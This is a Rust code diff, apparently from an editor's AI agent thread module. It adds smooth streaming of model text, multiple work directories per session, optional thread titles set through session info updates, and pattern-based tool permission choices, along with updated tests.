+ /// Text received from the model but not yet appended to the Markdown source.
+ pending: String,
+ /// The number of bytes to reveal per timer turn.
+ bytes_to_reveal_per_tick: usize,
+ /// The Markdown entity being streamed into.
+ target: Entity<Markdown>,
+ /// Timer task that periodically moves text from `pending` into `source`.
+ _reveal_task: Task<()>,
+}
+
+impl StreamingTextBuffer {
+ /// The number of milliseconds between each timer tick, controlling how quickly
+ /// text is revealed.
+ const TASK_UPDATE_MS: u64 = 16;
+ /// The time in milliseconds to reveal the entire pending text.
+ const REVEAL_TARGET: f32 = 200.0;
}
impl From<&AcpThread> for ActionLogTelemetry {
@@ -1094,8 +1173,8 @@ impl Error for LoadError {}
impl AcpThread {
pub fn new(
parent_session_id: Option<acp::SessionId>,
- title: impl Into<SharedString>,
- cwd: Option<PathBuf>,
+ title: Option<SharedString>,
+ work_dirs: Option<PathList>,
connection: Rc<dyn AgentConnection>,
project: Entity<Project>,
action_log: Entity<ActionLog>,
@@ -1116,12 +1195,12 @@ impl AcpThread {
Self {
parent_session_id,
- cwd,
+ work_dirs,
action_log,
shared_buffers: Default::default(),
entries: Default::default(),
plan: Default::default(),
- title: title.into(),
+ title,
provisional_title: None,
project,
running_turn: None,
@@ -1137,6 +1216,7 @@ impl AcpThread {
had_error: false,
draft_prompt: None,
ui_scroll_position: None,
+ streaming_text_buffer: None,
}
}
@@ -1176,10 +1256,14 @@ impl AcpThread {
&self.project
}
- pub fn title(&self) -> SharedString {
- self.provisional_title
+ pub fn title(&self) -> Option<SharedString> {
+ self.title
.clone()
- .unwrap_or_else(|| self.title.clone())
+ .or_else(|| self.provisional_title.clone())
+ }
+
+ pub fn has_provisional_title(&self) -> bool {
+ self.provisional_title.is_some()
}
pub fn entries(&self) -> &[AgentThreadEntry] {
@@ -1190,8 +1274,8 @@ impl AcpThread {
&self.session_id
}
- pub fn cwd(&self) -> Option<&PathBuf> {
- self.cwd.as_ref()
+ pub fn work_dirs(&self) -> Option<&PathList> {
+ self.work_dirs.as_ref()
}
pub fn status(&self) -> ThreadStatus {
@@ -1296,6 +1380,18 @@ impl AcpThread {
acp::SessionUpdate::Plan(plan) => {
self.update_plan(plan, cx);
}
+ acp::SessionUpdate::SessionInfoUpdate(info_update) => {
+ if let acp::MaybeUndefined::Value(title) = info_update.title {
+ let had_provisional = self.provisional_title.take().is_some();
+ let title: SharedString = title.into();
+ if self.title.as_ref() != Some(&title) {
+ self.title = Some(title);
+ cx.emit(AcpThreadEvent::TitleUpdated);
+ } else if had_provisional {
+ cx.emit(AcpThreadEvent::TitleUpdated);
+ }
+ }
+ }
acp::SessionUpdate::AvailableCommandsUpdate(acp::AvailableCommandsUpdate {
available_commands,
..
@@ -1343,6 +1439,7 @@ impl AcpThread {
}) = last_entry
&& *existing_indented == indented
{
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
*id = message_id.or(id.take());
content.append(chunk.clone(), &language_registry, path_style, cx);
chunks.push(chunk);
@@ -1379,8 +1476,20 @@ impl AcpThread {
indented: bool,
cx: &mut Context<Self>,
) {
- let language_registry = self.project.read(cx).languages().clone();
let path_style = self.project.read(cx).path_style(cx);
+
+ // For text chunks going to an existing Markdown block, buffer for smooth
+ // streaming instead of appending all at once which may feel more choppy.
+ if let acp::ContentBlock::Text(text_content) = &chunk {
+ if let Some(markdown) = self.streaming_markdown_target(is_thought, indented) {
+ let entries_len = self.entries.len();
+ cx.emit(AcpThreadEvent::EntryUpdated(entries_len - 1));
+ self.buffer_streaming_text(&markdown, text_content.text.clone(), cx);
+ return;
+ }
+ }
+
+ let language_registry = self.project.read(cx).languages().clone();
let entries_len = self.entries.len();
if let Some(last_entry) = self.entries.last_mut()
&& let AgentThreadEntry::AssistantMessage(AssistantMessage {
@@ -1391,6 +1500,7 @@ impl AcpThread {
&& *existing_indented == indented
{
let idx = entries_len - 1;
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
cx.emit(AcpThreadEvent::EntryUpdated(idx));
match (chunks.last_mut(), is_thought) {
(Some(AssistantMessageChunk::Message { block }), false)
@@ -1425,7 +1535,134 @@ impl AcpThread {
}
}
+ fn streaming_markdown_target(
+ &self,
+ is_thought: bool,
+ indented: bool,
+ ) -> Option<Entity<Markdown>> {
+ let last_entry = self.entries.last()?;
+ if let AgentThreadEntry::AssistantMessage(AssistantMessage {
+ chunks,
+ indented: existing_indented,
+ ..
+ }) = last_entry
+ && *existing_indented == indented
+ && let [.., chunk] = chunks.as_slice()
+ {
+ match (chunk, is_thought) {
+ (
+ AssistantMessageChunk::Message {
+ block: ContentBlock::Markdown { markdown },
+ },
+ false,
+ )
+ | (
+ AssistantMessageChunk::Thought {
+ block: ContentBlock::Markdown { markdown },
+ },
+ true,
+ ) => Some(markdown.clone()),
+ _ => None,
+ }
+ } else {
+ None
+ }
+ }
+
+ /// Add text to the streaming buffer. If the target changed (e.g. switching
+ /// from thoughts to message text), flush the old buffer first.
+ fn buffer_streaming_text(
+ &mut self,
+ markdown: &Entity<Markdown>,
+ text: String,
+ cx: &mut Context<Self>,
+ ) {
+ if let Some(buffer) = &mut self.streaming_text_buffer {
+ if buffer.target.entity_id() == markdown.entity_id() {
+ buffer.pending.push_str(&text);
+
+ buffer.bytes_to_reveal_per_tick = (buffer.pending.len() as f32
+ / StreamingTextBuffer::REVEAL_TARGET
+ * StreamingTextBuffer::TASK_UPDATE_MS as f32)
+ .ceil() as usize;
+ return;
+ }
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
+ }
+
+ let target = markdown.clone();
+ let _reveal_task = self.start_streaming_reveal(cx);
+ let pending_len = text.len();
+ let bytes_to_reveal = (pending_len as f32 / StreamingTextBuffer::REVEAL_TARGET
+ * StreamingTextBuffer::TASK_UPDATE_MS as f32)
+ .ceil() as usize;
+ self.streaming_text_buffer = Some(StreamingTextBuffer {
+ pending: text,
+ bytes_to_reveal_per_tick: bytes_to_reveal,
+ target,
+ _reveal_task,
+ });
+ }
+
+ /// Flush all buffered streaming text into the Markdown entity immediately.
+ fn flush_streaming_text(
+ streaming_text_buffer: &mut Option<StreamingTextBuffer>,
+ cx: &mut Context<Self>,
+ ) {
+ if let Some(buffer) = streaming_text_buffer.take() {
+ if !buffer.pending.is_empty() {
+ buffer
+ .target
+ .update(cx, |markdown, cx| markdown.append(&buffer.pending, cx));
+ }
+ }
+ }
+
+ /// Spawns a foreground task that periodically drains
+ /// `streaming_text_buffer.pending` into the target `Markdown` entity,
+ /// producing smooth, continuous text output.
+ fn start_streaming_reveal(&self, cx: &mut Context<Self>) -> Task<()> {
+ cx.spawn(async move |this, cx| {
+ loop {
+ cx.background_executor()
+ .timer(Duration::from_millis(StreamingTextBuffer::TASK_UPDATE_MS))
+ .await;
+
+ let should_continue = this
+ .update(cx, |this, cx| {
+ let Some(buffer) = &mut this.streaming_text_buffer else {
+ return false;
+ };
+
+ if buffer.pending.is_empty() {
+ return true;
+ }
+
+ let pending_len = buffer.pending.len();
+
+ let byte_boundary = buffer
+ .pending
+ .ceil_char_boundary(buffer.bytes_to_reveal_per_tick)
+ .min(pending_len);
+
+ buffer.target.update(cx, |markdown: &mut Markdown, cx| {
+ markdown.append(&buffer.pending[..byte_boundary], cx);
+ buffer.pending.drain(..byte_boundary);
+ });
+
+ true
+ })
+ .unwrap_or(false);
+
+ if !should_continue {
+ break;
+ }
+ }
+ })
+ }
+
fn push_entry(&mut self, entry: AgentThreadEntry, cx: &mut Context<Self>) {
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
self.entries.push(entry);
cx.emit(AcpThreadEvent::NewEntry);
}
@@ -1436,8 +1673,8 @@ impl AcpThread {
pub fn set_title(&mut self, title: SharedString, cx: &mut Context<Self>) -> Task<Result<()>> {
let had_provisional = self.provisional_title.take().is_some();
- if title != self.title {
- self.title = title.clone();
+ if self.title.as_ref() != Some(&title) {
+ self.title = Some(title.clone());
cx.emit(AcpThreadEvent::TitleUpdated);
if let Some(set_title) = self.connection.set_title(&self.session_id, cx) {
return set_title.run(title, cx);
@@ -1741,7 +1978,7 @@ impl AcpThread {
tool_call: acp::ToolCallUpdate,
options: PermissionOptions,
cx: &mut Context<Self>,
- ) -> Result<Task<acp::RequestPermissionOutcome>> {
+ ) -> Result<Task<RequestPermissionOutcome>> {
let (tx, rx) = oneshot::channel();
let status = ToolCallStatus::WaitingForConfirmation {
@@ -1757,10 +1994,8 @@ impl AcpThread {
Ok(cx.spawn(async move |this, cx| {
let outcome = match rx.await {
- Ok(option) => acp::RequestPermissionOutcome::Selected(
- acp::SelectedPermissionOutcome::new(option),
- ),
- Err(oneshot::Canceled) => acp::RequestPermissionOutcome::Cancelled,
+ Ok(outcome) => RequestPermissionOutcome::Selected(outcome),
+ Err(oneshot::Canceled) => RequestPermissionOutcome::Cancelled,
};
this.update(cx, |_this, cx| {
cx.emit(AcpThreadEvent::ToolAuthorizationReceived(tool_call_id))
@@ -1773,15 +2008,14 @@ impl AcpThread {
pub fn authorize_tool_call(
&mut self,
id: acp::ToolCallId,
- option_id: acp::PermissionOptionId,
- option_kind: acp::PermissionOptionKind,
+ outcome: SelectedPermissionOutcome,
cx: &mut Context<Self>,
) {
let Some((ix, call)) = self.tool_call_mut(&id) else {
return;
};
- let new_status = match option_kind {
+ let new_status = match outcome.option_kind {
acp::PermissionOptionKind::RejectOnce | acp::PermissionOptionKind::RejectAlways => {
ToolCallStatus::Rejected
}
@@ -1794,7 +2028,7 @@ impl AcpThread {
let curr_status = mem::replace(&mut call.status, new_status);
if let ToolCallStatus::WaitingForConfirmation { respond_tx, .. } = curr_status {
- respond_tx.send(option_id).log_err();
+ respond_tx.send(outcome).log_err();
} else if cfg!(debug_assertions) {
panic!("tried to authorize an already authorized tool call");
}
@@ -1970,6 +2204,8 @@ impl AcpThread {
match response {
Ok(r) => {
+ Self::flush_streaming_text(&mut this.streaming_text_buffer, cx);
+
if r.stop_reason == acp::StopReason::MaxTokens {
this.had_error = true;
cx.emit(AcpThreadEvent::Error);
@@ -2022,6 +2258,8 @@ impl AcpThread {
Ok(Some(r))
}
Err(e) => {
+ Self::flush_streaming_text(&mut this.streaming_text_buffer, cx);
+
this.had_error = true;
cx.emit(AcpThreadEvent::Error);
log::error!("Error in run turn: {:?}", e);
@@ -2039,6 +2277,7 @@ impl AcpThread {
};
self.connection.cancel(&self.session_id, cx);
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
self.mark_pending_tools_as_canceled();
// Wait for the send task to complete
@@ -2103,6 +2342,7 @@ impl AcpThread {
return Task::ready(Err(anyhow!("not supported")));
};
+ Self::flush_streaming_text(&mut self.streaming_text_buffer, cx);
let telemetry = ActionLogTelemetry::from(&*self);
cx.spawn(async move |this, cx| {
cx.update(|cx| truncate.run(id.clone(), cx)).await?;
@@ -2682,7 +2922,7 @@ mod tests {
use futures::{channel::mpsc, future::LocalBoxFuture, select};
use gpui::{App, AsyncApp, TestAppContext, WeakEntity};
use indoc::indoc;
- use project::{FakeFs, Fs};
+ use project::{AgentId, FakeFs, Fs};
use rand::{distr, prelude::*};
use serde_json::json;
use settings::SettingsStore;
@@ -2695,7 +2935,7 @@ mod tests {
sync::atomic::{AtomicBool, AtomicUsize, Ordering::SeqCst},
time::Duration,
};
- use util::path;
+ use util::{path, path_list::PathList};
fn init_test(cx: &mut TestAppContext) {
env_logger::try_init().ok();
@@ -2713,7 +2953,13 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(
+ project,
+ PathList::new(&[std::path::Path::new(path!("/test"))]),
+ cx,
+ )
+ })
.await
.unwrap();
@@ -2777,7 +3023,13 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, std::path::Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(
+ project,
+ PathList::new(&[std::path::Path::new(path!("/test"))]),
+ cx,
+ )
+ })
.await
.unwrap();
@@ -2865,7 +3117,13 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project.clone(), Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(
+ project.clone(),
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
+ })
.await
.unwrap();
@@ -2976,7 +3234,9 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3070,7 +3330,9 @@ mod tests {
));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3151,7 +3413,9 @@ mod tests {
.unwrap();
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3192,7 +3456,9 @@ mod tests {
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3267,7 +3533,9 @@ mod tests {
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3341,7 +3609,9 @@ mod tests {
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/tmp")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/tmp"))]), cx)
+ })
.await
.unwrap();
@@ -3389,7 +3659,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3480,7 +3752,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3539,7 +3813,9 @@ mod tests {
}
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3712,7 +3988,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3788,7 +4066,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3861,7 +4141,9 @@ mod tests {
}
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -3982,6 +4264,10 @@ mod tests {
}
impl AgentConnection for FakeAgentConnection {
+ fn agent_id(&self) -> AgentId {
+ AgentId::new("fake")
+ }
+
fn telemetry_id(&self) -> SharedString {
"fake".into()
}
@@ -3993,7 +4279,7 @@ mod tests {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut App,
) -> Task<gpui::Result<Entity<AcpThread>>> {
let session_id = acp::SessionId::new(
@@ -4007,8 +4293,8 @@ mod tests {
let thread = cx.new(|cx| {
AcpThread::new(
None,
- "Test",
- Some(cwd.to_path_buf()),
+ None,
+ Some(work_dirs),
self.clone(),
project,
action_log,
@@ -4027,7 +4313,7 @@ mod tests {
}
fn authenticate(&self, method: acp::AuthMethodId, _cx: &mut App) -> Task<gpui::Result<()>> {
- if self.auth_methods().iter().any(|m| m.id == method) {
+ if self.auth_methods().iter().any(|m| m.id() == &method) {
Task::ready(Ok(()))
} else {
Task::ready(Err(anyhow!("Invalid Auth Method")))
@@ -4107,7 +4393,9 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4173,7 +4461,9 @@ mod tests {
let project = Project::test(fs, [], cx).await;
let connection = Rc::new(FakeAgentConnection::new());
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4486,7 +4776,9 @@ mod tests {
));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4560,7 +4852,9 @@ mod tests {
}));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4643,7 +4937,9 @@ mod tests {
));
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
@@ -4691,13 +4987,15 @@ mod tests {
let set_title_calls = connection.set_title_calls.clone();
let thread = cx
- .update(|cx| connection.new_session(project, Path::new(path!("/test")), cx))
+ .update(|cx| {
+ connection.new_session(project, PathList::new(&[Path::new(path!("/test"))]), cx)
+ })
.await
.unwrap();
// Initial title is the default.
thread.read_with(cx, |thread, _| {
- assert_eq!(thread.title().as_ref(), "Test");
+ assert_eq!(thread.title(), None);
});
// Setting a provisional title updates the display title.
@@ -4705,7 +5003,10 @@ mod tests {
thread.set_provisional_title("Hello, can you help…".into(), cx);
});
thread.read_with(cx, |thread, _| {
- assert_eq!(thread.title().as_ref(), "Hello, can you help…");
+ assert_eq!(
+ thread.title().as_ref().map(|s| s.as_str()),
+ Some("Hello, can you help…")
+ );
});
// The provisional title should NOT have propagated to the connection.
@@ -4722,7 +5023,10 @@ mod tests {
});
task.await.expect("set_title should succeed");
thread.read_with(cx, |thread, _| {
- assert_eq!(thread.title().as_ref(), "Helping with Rust question");
+ assert_eq!(
+ thread.title().as_ref().map(|s| s.as_str()),
+ Some("Helping with Rust question")
+ );
});
assert_eq!(
set_title_calls.borrow().as_slice(),
@@ -4730,4 +5034,80 @@ mod tests {
"real title should propagate to the connection"
);
}
+
+ #[gpui::test]
+ async fn test_session_info_update_replaces_provisional_title_and_emits_event(
+ cx: &mut TestAppContext,
+ ) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let project = Project::test(fs, [], cx).await;
+ let connection = Rc::new(FakeAgentConnection::new());
+
+ let thread = cx
+ .update(|cx| {
+ connection.clone().new_session(
+ project,
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
+ })
+ .await
+ .unwrap();
+
+ let title_updated_events = Rc::new(RefCell::new(0usize));
+ let title_updated_events_for_subscription = title_updated_events.clone();
+ thread.update(cx, |_thread, cx| {
+ cx.subscribe(
+ &thread,
+ move |_thread, _event_thread, event: &AcpThreadEvent, _cx| {
+ if matches!(event, AcpThreadEvent::TitleUpdated) {
+ *title_updated_events_for_subscription.borrow_mut() += 1;
+ }
+ },
+ )
+ .detach();
+ });
+
+ thread.update(cx, |thread, cx| {
+ thread.set_provisional_title("Hello, can you help…".into(), cx);
+ });
+ assert_eq!(
+ *title_updated_events.borrow(),
+ 1,
+ "setting a provisional title should emit TitleUpdated"
+ );
+
+ let result = thread.update(cx, |thread, cx| {
+ thread.handle_session_update(
+ acp::SessionUpdate::SessionInfoUpdate(
+ acp::SessionInfoUpdate::new().title("Helping with Rust question"),
+ ),
+ cx,
+ )
+ });
+ result.expect("session info update should succeed");
+
+ thread.read_with(cx, |thread, _| {
+ assert_eq!(
+ thread.title().as_ref().map(|s| s.as_str()),
+ Some("Helping with Rust question")
+ );
+ assert!(
+ !thread.has_provisional_title(),
+ "session info title update should clear provisional title"
+ );
+ });
+
+ assert_eq!(
+ *title_updated_events.borrow(),
+ 2,
+ "session info title update should emit TitleUpdated"
+ );
+ assert!(
+ connection.set_title_calls.borrow().is_empty(),
+ "session info title update should not propagate back to the connection"
+ );
+ }
}
@@ -2,20 +2,15 @@ use crate::AcpThread;
use agent_client_protocol::{self as acp};
use anyhow::Result;
use chrono::{DateTime, Utc};
-use collections::IndexMap;
+use collections::{HashMap, IndexMap};
use gpui::{Entity, SharedString, Task};
use language_model::LanguageModelProviderId;
-use project::Project;
+use project::{AgentId, Project};
use serde::{Deserialize, Serialize};
-use std::{
- any::Any,
- error::Error,
- fmt,
- path::{Path, PathBuf},
- rc::Rc,
- sync::Arc,
-};
+use std::{any::Any, error::Error, fmt, path::PathBuf, rc::Rc, sync::Arc};
+use task::{HideStrategy, SpawnInTerminal, TaskId};
use ui::{App, IconName};
+use util::path_list::PathList;
use uuid::Uuid;
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)]
@@ -27,13 +22,37 @@ impl UserMessageId {
}
}
+pub fn build_terminal_auth_task(
+ id: String,
+ label: String,
+ command: String,
+ args: Vec<String>,
+ env: HashMap<String, String>,
+) -> SpawnInTerminal {
+ SpawnInTerminal {
+ id: TaskId(id),
+ full_label: label.clone(),
+ label: label.clone(),
+ command: Some(command),
+ args,
+ command_label: label,
+ env,
+ use_new_terminal: true,
+ allow_concurrent_runs: true,
+ hide: HideStrategy::Always,
+ ..Default::default()
+ }
+}
+
pub trait AgentConnection {
+ fn agent_id(&self) -> AgentId;
+
fn telemetry_id(&self) -> SharedString;
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ _work_dirs: PathList,
cx: &mut App,
) -> Task<Result<Entity<AcpThread>>>;
@@ -47,7 +66,7 @@ pub trait AgentConnection {
self: Rc<Self>,
_session_id: acp::SessionId,
_project: Entity<Project>,
- _cwd: &Path,
+ _work_dirs: PathList,
_title: Option<SharedString>,
_cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -60,7 +79,11 @@ pub trait AgentConnection {
}
/// Close an existing session. Allows the agent to free the session from memory.
- fn close_session(&self, _session_id: &acp::SessionId, _cx: &mut App) -> Task<Result<()>> {
+ fn close_session(
+ self: Rc<Self>,
+ _session_id: &acp::SessionId,
+ _cx: &mut App,
+ ) -> Task<Result<()>> {
Task::ready(Err(anyhow::Error::msg("Closing sessions is not supported")))
}
@@ -74,7 +97,7 @@ pub trait AgentConnection {
self: Rc<Self>,
_session_id: acp::SessionId,
_project: Entity<Project>,
- _cwd: &Path,
+ _work_dirs: PathList,
_title: Option<SharedString>,
_cx: &mut App,
) -> Task<Result<Entity<AcpThread>>> {
@@ -90,6 +113,14 @@ pub trait AgentConnection {
fn auth_methods(&self) -> &[acp::AuthMethod];
+ fn terminal_auth_task(
+ &self,
+ _method: &acp::AuthMethodId,
+ _cx: &App,
+ ) -> Option<SpawnInTerminal> {
+ None
+ }
+
fn authenticate(&self, method: acp::AuthMethodId, cx: &mut App) -> Task<Result<()>>;
fn prompt(
@@ -239,9 +270,10 @@ impl AgentSessionListResponse {
#[derive(Debug, Clone, PartialEq)]
pub struct AgentSessionInfo {
pub session_id: acp::SessionId,
- pub cwd: Option<PathBuf>,
+ pub work_dirs: Option<PathList>,
pub title: Option<SharedString>,
pub updated_at: Option<DateTime<Utc>>,
+ pub created_at: Option<DateTime<Utc>>,
pub meta: Option<acp::Meta>,
}
@@ -249,9 +281,10 @@ impl AgentSessionInfo {
pub fn new(session_id: impl Into<acp::SessionId>) -> Self {
Self {
session_id: session_id.into(),
- cwd: None,
+ work_dirs: None,
title: None,
updated_at: None,
+ created_at: None,
meta: None,
}
}
@@ -437,18 +470,53 @@ impl AgentModelList {
pub struct PermissionOptionChoice {
pub allow: acp::PermissionOption,
pub deny: acp::PermissionOption,
+ pub sub_patterns: Vec<String>,
}
impl PermissionOptionChoice {
pub fn label(&self) -> SharedString {
self.allow.name.clone().into()
}
+
+ /// Build a `SelectedPermissionOutcome` for this choice.
+ ///
+ /// If the choice carries `sub_patterns`, they are attached as
+ /// `SelectedPermissionParams::Terminal`.
+ pub fn build_outcome(&self, is_allow: bool) -> crate::SelectedPermissionOutcome {
+ let option = if is_allow { &self.allow } else { &self.deny };
+
+ let params = if !self.sub_patterns.is_empty() {
+ Some(crate::SelectedPermissionParams::Terminal {
+ patterns: self.sub_patterns.clone(),
+ })
+ } else {
+ None
+ };
+
+ crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind).params(params)
+ }
+}
+
+/// Pairs a tool's permission pattern with its display name
+///
+/// For example, a pattern of `^cargo\\s+build(\\s|$)` would display as `cargo
+/// build`. It's handy to keep these together rather than trying to derive
+/// one from the other.
+#[derive(Debug, Clone, PartialEq)]
+pub struct PermissionPattern {
+ pub pattern: String,
+ pub display_name: String,
}
#[derive(Debug, Clone)]
pub enum PermissionOptions {
Flat(Vec<acp::PermissionOption>),
Dropdown(Vec<PermissionOptionChoice>),
+ DropdownWithPatterns {
+ choices: Vec<PermissionOptionChoice>,
+ patterns: Vec<PermissionPattern>,
+ tool_name: String,
+ },
}
impl PermissionOptions {
@@ -456,6 +524,7 @@ impl PermissionOptions {
match self {
PermissionOptions::Flat(options) => options.is_empty(),
PermissionOptions::Dropdown(options) => options.is_empty(),
+ PermissionOptions::DropdownWithPatterns { choices, .. } => choices.is_empty(),
}
}
@@ -474,6 +543,17 @@ impl PermissionOptions {
None
}
}),
+ PermissionOptions::DropdownWithPatterns { choices, .. } => {
+ choices.iter().find_map(|choice| {
+ if choice.allow.kind == kind {
+ Some(&choice.allow)
+ } else if choice.deny.kind == kind {
+ Some(&choice.deny)
+ } else {
+ None
+ }
+ })
+ }
}
}
@@ -486,6 +566,57 @@ impl PermissionOptions {
self.first_option_of_kind(acp::PermissionOptionKind::RejectOnce)
.map(|option| option.option_id.clone())
}
+
+ /// Build a `SelectedPermissionOutcome` for the `DropdownWithPatterns`
+ /// variant when the user has checked specific pattern indices.
+ ///
+ /// Returns `Some` with the always-allow/deny outcome when at least one
+ /// pattern is checked. Returns `None` when zero patterns are checked,
+ /// signaling that the caller should degrade to allow-once / deny-once.
+ ///
+ /// Panics (debug) or returns `None` (release) if called on a non-
+ /// `DropdownWithPatterns` variant.
+ pub fn build_outcome_for_checked_patterns(
+ &self,
+ checked_indices: &[usize],
+ is_allow: bool,
+ ) -> Option<crate::SelectedPermissionOutcome> {
+ let PermissionOptions::DropdownWithPatterns {
+ choices, patterns, ..
+ } = self
+ else {
+ debug_assert!(
+ false,
+ "build_outcome_for_checked_patterns called on non-DropdownWithPatterns"
+ );
+ return None;
+ };
+
+ let checked_patterns: Vec<String> = patterns
+ .iter()
+ .enumerate()
+ .filter(|(index, _)| checked_indices.contains(index))
+ .map(|(_, cp)| cp.pattern.clone())
+ .collect();
+
+ if checked_patterns.is_empty() {
+ return None;
+ }
+
+ // Use the first choice (the "Always" choice) as the base for the outcome.
+ let always_choice = choices.first()?;
+ let option = if is_allow {
+ &always_choice.allow
+ } else {
+ &always_choice.deny
+ };
+
+ let outcome = crate::SelectedPermissionOutcome::new(option.option_id.clone(), option.kind)
+ .params(Some(crate::SelectedPermissionParams::Terminal {
+ patterns: checked_patterns,
+ }));
+ Some(outcome)
+ }
}
#[cfg(feature = "test-support")]
@@ -534,11 +665,14 @@ mod test_support {
)
}
- #[derive(Clone, Default)]
+ #[derive(Clone)]
pub struct StubAgentConnection {
sessions: Arc<Mutex<HashMap<acp::SessionId, Session>>>,
permission_requests: HashMap<acp::ToolCallId, PermissionOptions>,
next_prompt_updates: Arc<Mutex<Vec<acp::SessionUpdate>>>,
+ supports_load_session: bool,
+ agent_id: AgentId,
+ telemetry_id: SharedString,
}
struct Session {
@@ -546,12 +680,21 @@ mod test_support {
response_tx: Option<oneshot::Sender<acp::StopReason>>,
}
+ impl Default for StubAgentConnection {
+ fn default() -> Self {
+ Self::new()
+ }
+ }
+
impl StubAgentConnection {
pub fn new() -> Self {
Self {
next_prompt_updates: Default::default(),
permission_requests: HashMap::default(),
sessions: Arc::default(),
+ supports_load_session: false,
+ agent_id: AgentId::new("stub"),
+ telemetry_id: "stub".into(),
}
}
@@ -567,6 +710,58 @@ mod test_support {
self
}
+ pub fn with_supports_load_session(mut self, supports_load_session: bool) -> Self {
+ self.supports_load_session = supports_load_session;
+ self
+ }
+
+ pub fn with_agent_id(mut self, agent_id: AgentId) -> Self {
+ self.agent_id = agent_id;
+ self
+ }
+
+ pub fn with_telemetry_id(mut self, telemetry_id: SharedString) -> Self {
+ self.telemetry_id = telemetry_id;
+ self
+ }
